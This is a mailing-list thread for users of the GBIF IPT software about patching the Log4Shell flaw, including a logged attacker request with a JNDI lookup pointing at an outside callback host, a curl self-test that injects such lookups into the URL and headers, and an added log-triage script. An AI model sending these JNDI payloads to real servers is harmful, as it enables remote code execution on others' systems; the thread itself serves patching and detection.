Dear IPT users,
We have released a new version of the IPT, version 2.5.4 [1]. This version contains fixes to critical security issues with the Struts and Log4J [2] libraries.
According to the press [3], the problem with the Log4J library vulnerability is being exploited by malicious users — and I can already see queries containing "jndi" in the web server logs for the IPTs GBIF hosts at cloud.gbif.org, although they are random attempts and would not succeed.
All users are highly encouraged to upgrade to this version as soon as possible.
As usual, upgrade and installation instructions are in the manual [1]. Please remember to check your data directory backup is working before starting the upgrade.
[1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
[2] https://www.lunasec.io/docs/blog/log4j-zero-day/
[3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critic...
Best regards,
Matthew
Hi Matthew,
As we've several hosted IPTs I upgraded immediately but after checking the logs it looks like it wasn't fast enough:
logging% bzgrep 'jndi' http-access.log.*|grep 'ipt'
http-access.log.1.bz2:Dec 11 17:04:39 router1 haproxy[14902]: 185.220.101.130 - - [11/Dec/2021:16:04:36 +0000] "GET /$%7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google%7D HTTP/1.1" 200 169114 "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "ipt.biodiversity.aq"
Our IPTs are hosted in dedicated (FreeBSD) jails and I haven't noticed anything suspicious... but is there anything that I should check for specifically?
Thanks, Julien
On Sat, Dec 11, 2021 at 10:55:35AM +0100, Matthew Blissett wrote:
IPT mailing list IPT@lists.gbif.org https://lists.gbif.org/mailman/listinfo/ipt
Hi Julien,
I don't think there would be a problem with these specific requests. The attacker has to make the IPT log the "jndi" string in the data-directory/logs/debug.log or admin.log files. You could test your own server, for example by listening on a TCP socket:
nc -lvp 1234
and running a similar request:
curl https://ipt.example.org/$%7Bjndi:ldap://127.0.0.1:1234/anything%7D -H "User-Agent: ${jndi:ldap://127.0.0.1:1234/anything}" -H "Referer: ${jndi:ldap://127.0.0.1:1234/anything}"
if you have any output from 'nc', there is potential for an exploit.
Cheers,
Matthew
On 13/12/2021 14:14, Julien Cigar wrote:
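A triage script for the access-log check Julien describes and the point Matthew makes about what matters (the lookup string has to reach the IPT's own logs; the access log only tells you who tried): an added example, not code from the IPT project or either poster. It assumes the HAProxy log format in Julien's line, undoes both the URL percent-encoding and HAProxy's #XX escaping visible there (and goes slightly beyond the page by also unwrapping double percent-encoding), and uses constructed placeholder values for the client IP, callback host and IPT hostname.

```python
"""Flag Log4Shell-style JNDI lookups in HAProxy/web access logs (added example,
not IPT project code). Undoes URL percent-encoding (%7B) and HAProxy's #XX
escaping of logged headers (the "$#7Bjndi" form), then extracts callback hosts."""
import re
from urllib.parse import unquote

# HAProxy writes non-printable/special characters in logged headers as #XX (hex).
_HAPROXY_ESC = re.compile(r"#([0-9A-Fa-f]{2})")
# After decoding, a lookup looks like ${jndi:<scheme>://<host>[:port]/<path>}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)", re.I)

def normalise(line: str) -> str:
    """Undo HAProxy #XX escaping and (repeated) percent-encoding."""
    line = _HAPROXY_ESC.sub(lambda m: chr(int(m.group(1), 16)), line)
    prev = None
    while prev != line:          # %2524 -> %24 -> $ : decode until stable
        prev, line = line, unquote(line)
    return line

def find_jndi(line: str):
    """Return the sorted list of (scheme, host) callbacks in one log line, or []."""
    return sorted({(m.group("scheme").lower(), m.group("host").lower())
                   for m in _JNDI.finditer(normalise(line))})

def triage(lines):
    """Map each client IP that sent a JNDI lookup to the callback hosts it used."""
    hits = {}
    for line in lines:
        found = find_jndi(line)
        if not found:
            continue
        ip = re.search(r"haproxy\[\d+\]: (\S+)", line)
        hits.setdefault(ip.group(1) if ip else "?", set()).update(h for _, h in found)
    return {ip: sorted(hosts) for ip, hosts in hits.items()}

# Constructed sample lines in the HAProxy format Julien posted; the IP and
# callback host are placeholders, not real indicators.
SAMPLE_LOG = [
    'Dec 11 17:04:39 router1 haproxy[14902]: 198.51.100.7 - - [11/Dec/2021:16:04:36 +0000] '
    '"GET /$%7Bjndi:ldap://callback.example.invalid/google%7D HTTP/1.1" 200 169114 '
    '"$#7Bjndi:ldap://callback.example.invalid/google#7D" "-" "ipt.example.org"',
    'Dec 11 17:05:02 router1 haproxy[14902]: 203.0.113.9 - - [11/Dec/2021:16:05:00 +0000] '
    '"GET /ipt/resource?r=dataset HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "ipt.example.org"',
]
if __name__ == "__main__":
    for ip, hosts in triage(SAMPLE_LOG).items():
        print(f"{ip} sent JNDI lookups pointing at {', '.join(hosts)}")
```

Hits here only show attempts; as Matthew notes, the next step is to grep the IPT's data-directory/logs/debug.log and admin.log for the same decoded string to see whether any reached Log4J.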
Dear IPT users,
Yesterday, the developers of the Log4J library used by the IPT issued a further security update, described at [1]. It is less severe than the first problem, since it does not allow attackers to run their own code on a hacked server.
The IPT does not use this part of Log4J, so we will not release a new version of the IPT for this.
It's still important to upgrade to version 2.5.4, containing Log4J version 2.15.0, as described in the email below.
Best regards,
Matthew
[1] https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/
On 11/12/2021 10:55, Matthew Blissett wrote: